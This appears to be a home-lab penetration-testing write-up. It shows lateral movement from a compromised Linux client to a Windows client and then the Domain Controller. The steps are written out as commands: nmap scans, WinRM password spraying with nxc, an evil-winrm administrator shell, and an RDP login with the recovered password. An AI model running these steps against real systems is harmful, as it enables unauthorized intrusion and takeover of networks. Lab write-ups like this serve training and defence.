After gaining initial access to janed@linux-client, the attacker attempts to move laterally across the network and escalate privileges to gain control over key systems, including the Windows Client and ultimately the Domain Controller.
cat /etc/os-release # Check OS version
hostname # Identify the machine nameOn another terminal, scanning the Windows Client (10.0.0.100):
nmap -p1-1000 -sV -Pn 10.0.0.100Scanning the Linux Client (10.0.0.101):
nmap -Pn -p5985,5986 -sV 10.0.0.101 # Checking for WinRM servicesResults show WinRM (Windows Remote Management) is filtered.
Since WinRM is present, the attacker attempts password spraying.
-
Create
users.txtandpass.txtcontaining potential credentials:users.txt: Administrator pass.txt: @Deeboodah1! password123! admin@123 -
Perform password spraying with nxc winrm:
nxc winrm 10.0.0.100 -u users.txt -p pass.txt
✅ A working credential is found: Administrator / @Deeboodah1!
-
Use Evil-WinRM to access the Windows Client as Administrator:
evil-winrm -i 10.0.0.100 -u Administrator -p @Deeboodah1!📌 This grants PowerShell administrator access to the Windows Client.
-
Scan the Domain Controller (10.0.0.5) for open services:
nmap -Pn 10.0.0.5
✅ Port
3389/tcp(Microsoft Remote Desktop) is open. -
Use xfreerdp to establish an RDP session to the Domain Controller:
xfreerdp /v:10.0.0.5 /u:Administrator /p:@Deeboodah1! /d:corp.project-x-dc.com✅ A new RDP window pops up, providing full control over the Domain Controller!
The attacker successfully:
- Escalated privileges from janed@linux-client to Administrator on Windows Client.
- Laterally moved to the Windows Client using WinRM.
- Compromised the Domain Controller using RDP credentials.
🔜 Next Phase: Data Exfiltration & Persistence 📂💀